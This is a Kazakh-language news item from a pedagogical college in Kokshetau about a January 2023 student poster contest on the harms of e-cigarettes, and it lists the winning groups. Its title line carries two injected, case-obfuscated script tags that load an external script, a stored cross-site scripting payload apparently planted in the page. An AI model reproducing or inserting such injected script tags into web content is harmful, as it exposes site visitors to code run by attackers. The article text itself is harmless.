«Шылым туралы шындық» постер байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
16.01.2023
2023 жылдың 12 қаңтар күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің жатақханасында «Шылым туралы шындық» атты постер байқауы өтті. Негізгі мақсат – студенттерге салауатты өмір салтын сақтаудың, зиянды әдеттен аулақ болудың маңызы туралы ақпарат беру, шығармашылық жұмыс арқылы өз бетімен ізденіп, ой түюге баулу.
Байқауға 8 команда қатысып, «Электронды темекі зиянсыз ба?» деген сұраққа жауап іздеді. Студенттер байқауға тыңғылықты дайындалған. Олар электронды темекінің түрлері, құрылысы, оның қай-қайсының адам денсаулығына зиянды әсері туралы ақпаратты жан-жақты қамтуға тырысқаны, ізденгені байқалды. Бас жүлдені М–11 тобы, І орынды БМ-11 тобы, ІІ орынды ДМ-12 тобы, ІІІ орынды МД-11 тобы иеленді.
Бас жүлдені жеңіп алған М-11 тобының студенті Хибатхан Ақбота сөзінің соңын «Ауырып ем іздегенше, ауырмайтын жол ізде» деген мақалмен қорытындылап, біздің мемлекетімізде де электронды темекі айналымына тыйым салу мәселесінің жақын арада шешімін табатынына үміттенетінін айтты.
Просмотров: 400